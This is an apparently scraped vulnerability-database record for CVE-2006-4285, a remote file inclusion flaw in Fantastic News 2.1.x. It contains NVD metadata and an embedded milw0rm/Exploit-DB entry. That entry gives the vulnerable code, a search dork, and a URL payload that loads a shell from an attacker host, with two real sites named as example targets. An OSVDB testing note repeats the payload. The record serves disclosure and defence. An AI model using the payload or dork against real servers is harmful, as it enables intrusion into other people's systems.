ID CVE-2006-4285Type cveReporter cve@mitre.orgModified 2018-10-17T21:34:00
Description
PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected.
{"id": "CVE-2006-4285", "bulletinFamily": "NVD", "title": "CVE-2006-4285", "description": "PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected.", "published": "2006-08-22T17:04:00", "modified": "2018-10-17T21:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4285", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/archive/1/457680/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/28469", "http://www.vupen.com/english/advisories/2006/3336", "http://fscripts.com/index.php", "https://www.exploit-db.com/exploits/2221", "http://www.securityfocus.com/bid/19613", "http://secunia.com/advisories/21571"], "cvelist": ["CVE-2006-4285"], "type": "cve", "lastseen": "2021-02-02T05:27:23", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:2221"]}, {"type": "osvdb", "idList": ["OSVDB:28031"]}], "modified": "2021-02-02T05:27:23", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-02-02T05:27:23", "rev": 2}, "vulnersScore": 7.3}, "cpe": ["cpe:/a:fscripts:fantastic_news:2.1.3", "cpe:/a:fscripts:fantastic_news:2.1.5", "cpe:/a:fscripts:fantastic_news:2.1.1", "cpe:/a:fscripts:fantastic_news:2.1.2"], "affectedSoftware": [{"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.1"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.3"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.5"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "2221", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/2221"}, {"name": "http://fscripts.com/index.php", "refsource": "MISC", "tags": ["Patch"], "url": "http://fscripts.com/index.php"}, {"name": "21571", "refsource": "SECUNIA", "tags": ["Patch", "Vendor Advisory", "Exploit"], "url": "http://secunia.com/advisories/21571"}, {"name": "19613", "refsource": "BID", "tags": ["Patch", "Exploit"], "url": "http://www.securityfocus.com/bid/19613"}, {"name": "20070121 Fantastic News <=- (news.php) Remote File Include Vulnerability", "refsource": "BUGTRAQ", "tags": [], "url": "http://www.securityfocus.com/archive/1/457680/100/0/threaded"}, {"name": "fantasticnews-news-file-include(28469)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28469"}, {"name": "ADV-2006-3336", "refsource": "VUPEN", "tags": ["Vendor Advisory"], "url": "http://www.vupen.com/english/advisories/2006/3336"}]}
{"exploitdb": [{"lastseen": "2016-01-31T15:47:13", "description": "Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability. CVE-2006-4285. Webapps exploit for php platform", "published": "2006-08-19T00:00:00", "type": "exploitdb", "title": "Fantastic News <= 2.1.3 script_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T00:00:00", "id": "EDB-ID:2221", "href": "https://www.exploit-db.com/exploits/2221/", "sourceData": "#==============================================================================================\n#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://fscripts.com/ \n# \n#Version : v2.1.2 & v2.1.3 \n# \n#================================================================================================\n#\n#Dork : \"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"\n#\n#================================================================================================\n#\n#Bug in : news.php\n#\n#Vlu Code :\n#--------------------------------\n# require_once($CONFIG['script_path'].\"config.php\");\n# require_once($CONFIG['script_path'].\"functions/functions.php\");\n# require_once($CONFIG['script_path'].\"functions/mysql.php\");\n# require_once($CONFIG['script_path'].\"functions/template.php\");\n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?\n#\n#Example :\n# http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3\n# http://lnx.evanescencewebsite.com/PressArchive =====> 2.1.2\n#\n#\n#\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)\n==================================================================================================\n\n# milw0rm.com [2006-08-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2221/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4285"], "edition": 1, "description": "## Manual Testing Notes\nhttp://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?\n## References:\nVendor URL: http://fscripts.com/free.php?id=1\n[Secunia Advisory ID:21571](https://secuniaresearch.flexerasoftware.com/advisories/21571/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2221\nFrSIRT Advisory: ADV-2006-3336\n[CVE-2006-4285](https://vulners.com/cve/CVE-2006-4285)\nBugtraq ID: 19613\n", "modified": "2006-08-19T06:34:02", "published": "2006-08-19T06:34:02", "href": "https://vulners.com/osvdb/OSVDB:28031", "id": "OSVDB:28031", "type": "osvdb", "title": "Fantastic News news.php CONFIG[script_path] Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
